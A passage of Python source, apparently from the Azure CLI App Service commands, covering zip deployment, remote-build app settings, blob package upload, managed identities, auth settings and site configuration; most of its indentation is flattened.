raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check the status of async deployment
if res.status_code == 202:
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
# check if there's an ongoing process
if res.status_code == 409:
raise UnclassifiedUserFault("There may be an ongoing deployment or your app setting has "
"WEBSITE_RUN_FROM_PACKAGE. Please track your deployment in {} and ensure the "
"WEBSITE_RUN_FROM_PACKAGE app setting is removed. Use 'az webapp config "
"appsettings list --name MyWebapp --resource-group MyResourceGroup --subscription "
"MySubscription' to list app settings and 'az webapp config appsettings delete "
"--name MyWebApp --resource-group MyResourceGroup --setting-names <setting-names> "
"to delete them.".format(deployment_status_url))
    # any other status code is treated as a deployment error
    if res.status_code:
        raise AzureInternalError("An error occurred during deployment. Status Code: {}, Details: {}"
                                 .format(res.status_code, res.text))
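# Prepares an app for a Kudu remote build: ensures SCM_DO_BUILD_DURING_DEPLOYMENT=true, removes
# WEBSITE_RUN_FROM_PACKAGE and ENABLE_ORYX_BUILD, then polls the SCM site until the new settings are
# visible (or the retry budget is exhausted).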
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
        raise CLIError('Could not find an \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
        filled_length = int(round(total_length * current / float(total)))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.utcnow()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ex:
        # Because of a spec mismatch, the SDK raises even when the status code is 200; swallow that case
if ex.status_code != 200:
raise ex
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code != 200:
raise ex
def show_webapp(cmd, resource_group_name, name, slot=None):
return _show_app(cmd, resource_group_name, name, "webapp", slot)
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None, # pylint: disable=unused-argument
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs): # pylint: disable=unused-argument
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.begin_create_or_update_slot if slot else client.web_apps.begin_create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None, force=False):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info, force)
instance.server_farm_id = dest_plan_info.id
return instance
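# Guards plan moves for function apps: only Windows Consumption <-> Elastic Premium switches are allowed,
# and a Premium -> Consumption move additionally requires the force flag.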
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance, force):
    general_switch_msg = 'Currently the switch is only allowed between Consumption and Elastic Premium plans.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise ResourceNotFoundError('Could not determine the current plan of the functionapp')
# Ensure all plans involved are windows. Reserved = true indicates Linux.
if src_plan_info.reserved or dest_plan_instance.reserved:
        raise ValidationError('This feature currently supports Windows to Windows plan migrations. For other '
                              'migrations, please redeploy.')
src_is_premium = is_plan_elastic_premium(cmd, src_plan_info)
dest_is_consumption = is_plan_consumption(cmd, dest_plan_instance)
if not (is_plan_consumption(cmd, src_plan_info) or src_is_premium):
raise ValidationError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
if not (dest_is_consumption or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise ValidationError('You are trying to move to a plan that is not a Consumption or an '
'Elastic Premium plan. ' +
general_switch_msg)
if src_is_premium and dest_is_consumption:
logger.warning('WARNING: Moving a functionapp from Premium to Consumption might result in loss of '
'functionality and cause the app to break. Please ensure the functionapp is compatible '
'with a Consumption plan and is not using any features only available in Premium.')
if not force:
raise RequiredArgumentMissingError('If you want to migrate a functionapp from a Premium to Consumption '
'plan, please re-run this command with the \'--force\' flag.')
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.begin_create_or_update(resource_group_name, name, site_envelope=instance)
def get_functionapp(cmd, resource_group_name, name, slot=None):
function_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not function_app or 'function' not in function_app.kind:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return function_app
def show_functionapp(cmd, resource_group_name, name, slot=None):
return _show_app(cmd, resource_group_name, name, 'functionapp', slot)
def list_webapp(cmd, resource_group_name=None):
full_list = _list_app(cmd.cli_ctx, resource_group_name)
    # filter out apps with kind == None as well as function apps
return list(filter(lambda x: x.kind is not None and "function" not in x.kind.lower(), full_list))
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_restore_from_deleted_app',
slot, request)
def list_function_app(cmd, resource_group_name=None):
return list(filter(lambda x: x.kind is not None and "function" in x.kind.lower(),
_list_app(cmd.cli_ctx, resource_group_name)))
def _show_app(cmd, resource_group_name, name, cmd_app_type, slot=None):
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not app:
raise ResourceNotFoundError("Unable to find {} '{}', in RG '{}'.".format(
cmd_app_type, name, resource_group_name))
app_type = _kind_to_app_type(app.kind) if app else None
if app_type != cmd_app_type:
raise ResourceNotFoundError(
"Unable to find {app_type} '{name}', in resource group '{resource_group}'".format(
app_type=cmd_app_type, name=name, resource_group=resource_group_name),
"Use 'az {app_type} show' to show {app_type}s".format(app_type=app_type))
app.site_config = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
_rename_server_farm_props(app)
_fill_ftp_publishing_url(cmd, app, resource_group_name, name, slot)
return app
def _kind_to_app_type(kind):
if "workflow" in kind:
return "logicapp"
if "function" in kind:
return "functionapp"
return "webapp"
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = []
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
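# Normalizes the identities argument into a tuple of (ARM identity payload, identity type string,
# user-assigned identity resource ids, whether the system-assigned identity is included). The MSI_LOCAL_ID
# sentinel (typically '[system]') selects the system-assigned identity.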
def _build_identities_info(identities):
from ._appservice_utils import MSI_LOCAL_ID
identities = identities or []
identity_types = []
if not identities or MSI_LOCAL_ID in identities:
identity_types.append('SystemAssigned')
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities:
identity_types.append('UserAssigned')
identity_types = ','.join(identity_types)
info = {'type': identity_types}
if external_identities:
info['userAssignedIdentities'] = {e: {} for e in external_identities}
return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
'ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
_, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
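        # Promote the identity type: if the app already has one kind of identity and the request adds the
        # other kind, the resulting type becomes SystemAssigned,UserAssigned; otherwise keep the single kind.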
if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_types = ResourceIdentityType.user_assigned
else:
identity_types = ResourceIdentityType.system_assigned
if webapp.identity:
webapp.identity.type = identity_types
else:
webapp.identity = ManagedServiceIdentity(type=identity_types)
if external_identities:
if not webapp.identity.user_assigned_identities:
webapp.identity.user_assigned_identities = {}
for identity in external_identities:
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update',
extra_parameter=webapp, slot=slot)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
web_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not web_app:
raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
return web_app.identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
IdentityType = cmd.get_models('ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
_, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
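        # Validate the identities to remove, downgrade the identity type when the last user-assigned
        # (or the system-assigned) identity is removed, and re-apply whatever user-assigned identities remain.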
if webapp.identity is None:
return webapp
to_remove = []
existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
if external_identities:
to_remove = {x.lower() for x in external_identities}
non_existing = to_remove.difference(existing_identities)
if non_existing:
raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
if not list(existing_identities - to_remove):
if webapp.identity.type == IdentityType.user_assigned:
webapp.identity.type = IdentityType.none
elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
webapp.identity.type = IdentityType.system_assigned
webapp.identity.user_assigned_identities = None
if remove_local_identity:
webapp.identity.type = (IdentityType.none
if webapp.identity.type == IdentityType.system_assigned or
webapp.identity.type == IdentityType.none
else IdentityType.user_assigned)
if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
webapp.identity.user_assigned_identities = {}
if to_remove:
for identity in list(existing_identities - to_remove):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
else:
for identity in list(existing_identities):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
if runtime_version is None:
return True
if runtime_version.startswith("~") and len(runtime_version) > 1:
try:
int(runtime_version[1:])
except ValueError:
return False
return True
split_versions = runtime_version.split('.')
if len(split_versions) != 3:
return False
for version in split_versions:
try:
int(version)
except ValueError:
return False
return True
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
# validate runtime version
if not is_auth_runtime_version_valid(runtime_version):
raise CLIError('Usage Error: --runtime-version set to invalid value')
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
    # note: getargvalues is already used in azure.cli.core.commands, and there is no simple
    # functional replacement for this deprecated method on Python 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot)
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def list_runtimes_hardcoded(linux=False):
if linux:
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['linux']]
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['windows']]
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None): # pylint: disable=unused-argument
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check if the app settings are propagated to the Kudu site correctly by calling its api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': get_az_user_agent()
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p].value,
'type':result.properties[p].type,
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
try:
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
except StopIteration:
pass
return webapp
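# Builds the linuxFxVersion/windowsFxVersion string, e.g. 'DOCKER|nginx:latest' for a single container or
# '<config type>|<encoded config>' for multi-container setups. A leading http(s):// registry scheme is
# stripped, and a single space is used to clear the value.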
def _format_fx_version(custom_image_name, container_config_type=None):
lower_custom_image_name = custom_image_name.lower()
if "https://" in lower_custom_image_name or "http://" in lower_custom_image_name:
custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "")
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
if not web_app:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
linux_fx = fx_version if (web_app.reserved or not web_app.is_xenon) else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any(linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
    # Encode the file content as base64 and return it as a UTF-8 string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
vnet_route_all_enabled=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled', 'vnet_route_all_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
    # note: getargvalues is already used in azure.cli.core.commands, and there is no simple
    # functional replacement for this deprecated method on Python 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
# https://github.com/Azure/azure-cli/issues/14857
updating_ip_security_restrictions = False
result = {}
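    # each generic configuration value is either a JSON object or a plain KEY=VALUE pair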
for s in generic_configurations:
try:
json_object = get_json_object(s)
for config_name in json_object:
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
result.update(json_object)
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
if config_name.lower() == 'ip_security_restrictions':
updating_ip_security_restrictions = True
setattr(configs, config_name, value)
if not updating_ip_security_restrictions:
setattr(configs, 'ip_security_restrictions', None)
setattr(configs, 'scm_ip_security_restrictions', None)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
